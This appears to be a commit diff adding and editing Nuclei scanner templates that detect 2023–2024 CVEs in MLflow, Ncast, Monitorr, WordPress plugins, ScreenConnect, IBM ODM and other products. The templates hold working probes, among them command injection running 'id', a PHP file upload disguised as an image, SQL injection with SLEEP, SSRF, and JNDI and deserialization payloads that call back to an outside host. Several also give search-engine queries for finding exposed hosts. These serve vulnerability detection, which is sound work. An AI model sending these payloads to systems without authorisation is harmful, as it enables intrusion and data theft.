- raw:
- |
POST /php/ping.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "TTL="
- type: status
status:
- 200
# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950

View File

@ -6,24 +6,25 @@ info:
severity: critical severity: critical
description: | description: |
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2. Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
impact: |
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
remediation: |
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
reference: reference:
- https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/ - https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6909 - https://nvd.nist.gov/vuln/detail/CVE-2023-6909
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1 - https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
impact: |
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
remediation: |
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3 cvss-score: 9.3
cve-id: CVE-2023-6909 cve-id: CVE-2023-6909
cwe-id: CWE-29 cwe-id: CWE-29
metadata: metadata:
max-request: 5
verified: true verified: true
vendor: lfprojects vendor: lfprojects
product: mlflow product: mlflow
shodan-query: http.title:"mlflow" shodan-query: "http.title:\"mlflow\""
tags: cve,cve2023,mlflow,lfi tags: cve,cve2023,mlflow,lfi
http: http:
@ -90,4 +91,4 @@ http:
json: json:
- '.run.info.run_id' - '.run.info.run_id'
internal: true internal: true
# digest: 4a0a00473045022057cab29fe3d00006c6db44ac420a34cecdad60ef71ae6159d9d1870d61d97420022100cd6d7114a977b54c1190e1a9a7002626d05b41874dccf1e9e5d38cacc7082c6d:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100dc4c33652fcf1a1d0dc29690ac81838de82d0c439cc405cb3b0296d4e10cb855022100b3a49f754395ee217ea12cc561be556cc6c3a8da3facee851d5f37fdbab72d61:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,52 @@
id: CVE-2024-0305
info:
name: Ncast busiFacade - Remote Command Execution
author: BMCel
severity: high
description: |
The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.
impact: |
Allows remote attackers to execute arbitrary code on the affected system.
reference:
- https://cxsecurity.com/cveshow/CVE-2024-0305
- https://nvd.nist.gov/vuln/detail/CVE-2024-0305
- https://vuldb.com/?id.249872
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-0305
epss-score: 0.00064
epss-percentile: 0.2597
cpe: cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: ncast_project
product: ncast
fofa-query: app="Ncast-产品" && title=="高清智能录播系统"
zoomeye-query: title:"高清智能录播系统"
tags: cve,cve2024,ncast,rce
http:
- raw:
- |
POST /classes/common/busiFacade.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- "#str"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502207fea590b5f6bf722200ca68b8832b7c0d3a272c55c2c93cc238fef99772514d0022100b0ca7e5f0234813a63935fa5767fe9d688e5e741e2cd658b5cb02f79d241a220:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,70 @@
id: CVE-2024-0713
info:
name: Monitorr Services Configuration - Arbitrary File Upload
author: DhiyaneshDK
severity: high
description: |
A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
reference:
- https://github.com/Tropinene/Yscanner
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-0713
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2024-0713
cwe-id: CWE-434
cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
epss-score: 0.00061
epss-percentile: 0.2356
metadata:
vendor: monitorr
product: monitorr
verified: true
fofa-query: "icon_hash=\"-211006074\""
max-request: 2
tags: cve,cve2024,file-upload,intrusive,monitorr
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /assets/php/upload.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaquxwjsn
------WebKitFormBoundaryaquxwjsn
Content-Disposition: form-data; name="fileToUpload"; filename="{{file}}.php"
Content-Type: image/jpeg
{{base64_decode('/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooA//2Tw/cGhwIGVjaG8gJ3h4eHh4eGF0ZmVyc290Zyc7Pz4=')}}
------WebKitFormBoundaryaquxwjsn--
matchers:
- type: word
part: body
internal: true
words:
- "has been uploaded to:"
- raw:
- |
GET /assets/data/usrimg/{{file}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "atfersotg"
- type: status
status:
- 200
# digest: 490a0046304402201b9bb4536c3d56e915516c2b0156629ce6f3689a312eddd8d0694b86aa144e1902203d8dccbcbba044b30e6fff72ceb7f66bf40a9bf6f3130c3f3b11b0ec3c30a863:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,35 @@
id: CVE-2024-1021
info:
name: Rebuild <= 3.5.5 - Server-Side Request Forgery
author: BMCel
severity: medium
description: |
There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
reference:
- https://github.com/getrebuild/rebuild
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
impact: |
Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
remediation: |
Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
metadata:
max-request: 2
verified: true
fofa-query: "icon_hash=\"871154672\""
tags: cve2024,cve,rebuild,ssrf
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"
matchers:
- type: dsl
dsl:
- 'contains(body_2, "<h1> Interactsh Server </h1>")'
- '!contains(body_1, "<h1> Interactsh Server </h1>")'
- 'status_code_2 == 200'
condition: and
# digest: 4a0a004730450220491492872c6924a820f6183de45c341dbc8838eec5bd79f241a7a8e007817a4d022100bcf486a787a7ac18c43f5a856e8edf8c68546b59012e7c096bbc48085b3ce175:922c64590222798bb761d5b6d8e72950

View File

@ -6,14 +6,14 @@ info:
severity: high severity: high
description: | description: |
WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks. WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
reference: reference:
- https://www.tenable.com/security/research/tra-2024-02 - https://www.tenable.com/security/research/tra-2024-02
- https://wordpress.org/plugins/html5-video-player - https://wordpress.org/plugins/html5-video-player
- https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061 - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
impact: |
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
remediation: |
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
classification: classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6 cvss-score: 8.6
@ -21,7 +21,8 @@ info:
cwe-id: CWE-89 cwe-id: CWE-89
metadata: metadata:
verified: true verified: true
fofa-query: '"wordpress" && body="html5-video-player"' fofa-query: "\"wordpress\" && body=\"html5-video-player\""
max-request: 1
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player
http: http:
@ -36,4 +37,4 @@ http:
- 'contains(header, "application/json")' - 'contains(header, "application/json")'
- 'contains_all(body, "created_at", "video_id")' - 'contains_all(body, "created_at", "video_id")'
condition: and condition: and
# digest: 4b0a0048304602210082f5c18e0ac8422e532f5581f775dfd9a57d7c059cf6f41622d7a00306bfa3c6022100d0500ab738261efc3de306be7f8149c4a2f98b4c1560c26fe3617520ce9dd6e9:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100fa33c5d3e6fdd93832d18b7feaeceaab7dc13294ca6117b62c0cf322a734e7d3022100bec7347a690ebaf2785ae5b325485392dbdb16005fd15b862aca9a8930646034:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,57 @@
id: CVE-2024-1071
info:
name: WordPress Ultimate Member 2.1.3 - 2.8.2 SQL Injection
author: DhiyaneshDK,iamnooob
severity: critical
description: |
The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the sorting parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
remediation: Fixed in 2.8.3
reference:
- https://www.wordfence.com/blog/2024/02/2063-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-ultimate-member-wordpress-plugin/
- https://securityonline.info/cve-2024-1071-wordpress-ultimate-member-plugin-under-active-attack/
classification:
cve-id: CVE-2024-1071
cwe-id: CWE-89
metadata:
verified: true
max-request: 2
framework: wordpress
publicwww-query: "/wp-content/plugins/ultimate-member/"
zoomeye-query: app:"WordPress Ultimate Member Plugin"
fofa-query: body="/wp-content/plugins/ultimate-member"
tags: cve,cve2024,ultimate-member,wpscan,wordpress,wp-plugin
http:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php?action=um_get_members HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
directory_id=b9238&sorting=user_login,SLEEP(5)&nonce={{nonce}}
host-redirects: true
matchers:
- type: dsl
dsl:
- 'duration_2>=5'
- 'status_code_2 == 200'
- 'contains_all(body_2, "current_page", "total_pages")'
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- '"nonce":"([0-9a-z]+)"'
internal: true
# digest: 4b0a00483046022100cbbf2eef879ba4fd92a1ea6d44bcd473dbc968afabbde5391d5969feba1bc4c7022100eb9710892e9d92fa4d14b16004b74b743d42abe45900eeef50caf239ea91aaea:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,51 @@
id: CVE-2024-1208
info:
name: LearnDash LMS < 4.10.3 - Sensitive Information Exposure
author: ritikchaddha
severity: medium
description: |
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.
remediation: Fixed in 4.10.3
reference:
- https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210
- https://nvd.nist.gov/vuln/detail/CVE-2024-1208
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-1208
cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
vendor: learndash
product: learndash
framework: wordpress
googledork-query: inurl:"/wp-content/plugins/sfwd-lms"
publicwww-query: "/wp-content/plugins/sfwd-lms"
tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/sfwd-question"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"id":'
- '"question_type":'
- '"points_total":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a0046304402203916aaf1a8ee1aac0dd4cf38919e9f2e19085f8ccbbed45a47c932c1b491fb1302207bed484d250b4815723b4f03051d6f9f02504d362be0b2f60b4c99d8e8ff2ed3:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,54 @@
id: CVE-2024-1209
info:
name: LearnDash LMS < 4.10.2 - Sensitive Information Exposure via assignments
author: ritikchaddha
severity: medium
description: |
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.
remediation: Fixed in 4.10.2
reference:
- https://wpscan.com/vulnerability/f813a21d-7a6a-4ff4-a43c-3e2991a23c7f/
- https://github.com/karlemilnikka/CVE-2024-1209
- https://nvd.nist.gov/vuln/detail/CVE-2024-1209
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-1209
cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
vendor: learndash
product: learndash
framework: wordpress
googledork-query: inurl:"/wp-content/plugins/sfwd-lms"
publicwww-query: "/wp-content/plugins/sfwd-lms"
tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/sfwd-assignment"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"id":'
- 'slug":"assignment'
- '.pdf"'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a00473045022033bf2ad75dd487b69924c9295b5366eb34cca9066811d2354a8a4e034a2e6089022100f1f2ee39c0db1395ace5d071d86ed18c10d824d16cc00024087e0b9bb1eb8a37:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,52 @@
id: CVE-2024-1210
info:
name: LearnDash LMS < 4.10.2 - Sensitive Information Exposure
author: ritikchaddha
severity: medium
description: |
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.
remediation: Fixed in 4.10.2
reference:
- https://wpscan.com/vulnerability/f4b12179-3112-465a-97e1-314721f7fe3d/
- https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210
- https://nvd.nist.gov/vuln/detail/CVE-2024-1210
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-1210
cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
vendor: learndash
product: learndash
framework: wordpress
googledork-query: inurl:"/wp-content/plugins/sfwd-lms"
publicwww-query: "/wp-content/plugins/sfwd-lms"
tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/ldlms/v1/sfwd-quiz"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"id":'
- '"quiz_materials":'
- 'quizzes'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a00463044022079f0e028ee4fd33b5e897e0550a707be3dbe291e8085b9d175297108e9c8858102202a9344a25a6ec5fa1fc025e439a8887f6cc9c9ac50b6c199f1fa27e4cc948855:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,56 @@
id: CVE-2024-1709
info:
name: ConnectWise ScreenConnect 23.9.7 - Authentication Bypass
author: johnk3r
severity: critical
description: |
ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.
reference:
- https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
- https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
- https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
- https://nvd.nist.gov/vuln/detail/CVE-2024-1709
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2024-1709
cwe-id: CWE-288
metadata:
verified: true
max-request: 1
vendor: connectwise
product: screenconnect
shodan-query: http.favicon.hash:-82958153
fofa-query: app="ScreenConnect-Remote-Support-Software"
zoomeye-query: app:"ScreenConnect Remote Management Software"
hunter-query: app.name="ConnectWise ScreenConnect software"
tags: cve,cve2024,screenconnect,connectwise,auth-bypass,kev
variables:
string: "{{rand_text_alpha(10)}}"
http:
- method: GET
path:
- "{{BaseURL}}/SetupWizard.aspx/{{string}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SetupWizardPage"
- "ContentPanel SetupWizard"
condition: and
- type: status
status:
- 200
extractors:
- type: kval
part: header
kval:
- Server
# digest: 4a0a00473045022100a74505da69fc5fb96361adc56f169fe3a2e25cf85bc6df3b254da6430f8f723f02200dd625105f73d1d23ede46af0dbee84cce441acdb5c91079411b20c841a8bf23:922c64590222798bb761d5b6d8e72950

View File

@ -6,25 +6,26 @@ info:
severity: medium severity: medium
description: | description: |
A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload. A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.
impact: |
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
reference: reference:
- https://github.com/advisories/GHSA-ghmw-rwh8-6qmr - https://github.com/advisories/GHSA-ghmw-rwh8-6qmr
- https://nvd.nist.gov/vuln/detail/CVE-2024-21645 - https://nvd.nist.gov/vuln/detail/CVE-2024-21645
- https://github.com/fkie-cad/nvd-json-data-feeds - https://github.com/fkie-cad/nvd-json-data-feeds
impact: |
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3 cvss-score: 5.3
cve-id: CVE-2024-21645 cve-id: CVE-2024-21645
cwe-id: CWE-74 cwe-id: CWE-74
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
epss-score: 0.00046 epss-score: 0.00046
epss-percentile: 0.13723 epss-percentile: 0.13723
cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
metadata: metadata:
verified: true verified: true
vendor: pyload vendor: pyload
product: pyload product: pyload
shodan-query: title:"pyload" shodan-query: "title:\"pyload\""
max-request: 2
tags: cve,cve2024,pyload,authenticated,injection tags: cve,cve2024,pyload,authenticated,injection
variables: variables:
@ -59,4 +60,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100e4681bad6b75b2295f0256953d1d293a42d79e61b3607a307caf6cc5b040ccbb02201912657be888fe3a799ada24aaa1de05d3667731e84900bedb0e556a187f2dfc:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402203cbf3ae7a02a2a68165345f0bd855eb6ab923669c8d2aa78f2922e0baee747f702201104ac76e942d9f3bff9d59b6e4227e4d59ff27e41aeca67e1138508b572d5b9:922c64590222798bb761d5b6d8e72950

View File

@ -18,8 +18,9 @@ info:
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:* cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
metadata: metadata:
vendor: ivanti vendor: ivanti
product: connect_secure product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\"" shodan-query: "html:\"welcome.cgi?p=logo\""
max-request: 1
tags: cve,cve2024,kev,ssrf,ivanti tags: cve,cve2024,kev,ssrf,ivanti
http: http:
@ -43,4 +44,4 @@ http:
- '/dana-na/' - '/dana-na/'
- 'WriteCSS' - 'WriteCSS'
condition: and condition: and
# digest: 4a0a00473045022100fefc6637185b28b4af8b503bdb7b89401fc591c34cb6082b20322ac0f1ad67c8022027e634cbc733ad699766de6d8eb8f22b6368d0b663cd28cbd957eaaf37f51838:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022031bba2e0349c9af3102196e00e85678ddbb51ba287e5d624558a50a3bbaa6be20221008a362ec4ef64ece7ab22636b902c72df49e1f72c519731e5c2eb22dec2db5c76:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,39 @@
id: CVE-2024-22319
info:
name: IBM Operational Decision Manager - JNDI Injection
author: DhiyaneshDK
severity: critical
description: |
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-22319
cwe-id: CWE-74
epss-score: 0.00283
epss-percentile: 0.67752
cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ibm
product: operational_decision_manager
shodan-query: html:"IBM ODM"
fofa-query: title="IBM ODM"
tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce
http:
- method: GET
path:
- "{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, "dns")
- 'contains(header, "application/json")'
- 'contains(body, "patchLevel\":")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100bd482d70c6c93cf274bdde0ad6aefa255e1e20edcff44034afb21a45d3fc96e802204f0c9289a94160d4606e60e859ca554ead9d6b21a8441a9d9bf065ec7f9f3cd4:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,49 @@
id: CVE-2024-22320
info:
name: IBM Operational Decision Manager - Java Deserialization
author: DhiyaneshDK
severity: high
description: |
IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.
reference:
- https://labs.watchtowr.com/double-k-o-rce-in-ibm-operation-decision-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2024-22320
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2024-22320
cwe-id: CWE-502
epss-score: 0.00283
epss-percentile: 0.67773
cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ibm
product: operational_decision_manager
shodan-query: html:"IBM ODM"
fofa-query: title="IBM ODM"
tags: cve,cve2024,ibm,odm,decision-manager,deserialization,jsf,rce
http:
- method: GET
path:
- '{{BaseURL}}/res/login.jsf?javax.faces.ViewState={{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- 'javax.servlet.ServletException'
- type: status
status:
- 500
# digest: 4a0a0047304502210098cb051d3eaa91348194c7ecd090833e583697c9d77cd778763d770664584db60220693f3bc37f42c69a6e2c7f3c052d0af3e6f5b6dabf1c36d80c23967672fc642b:922c64590222798bb761d5b6d8e72950

Some files were not shown because too many files have changed in this diff Show More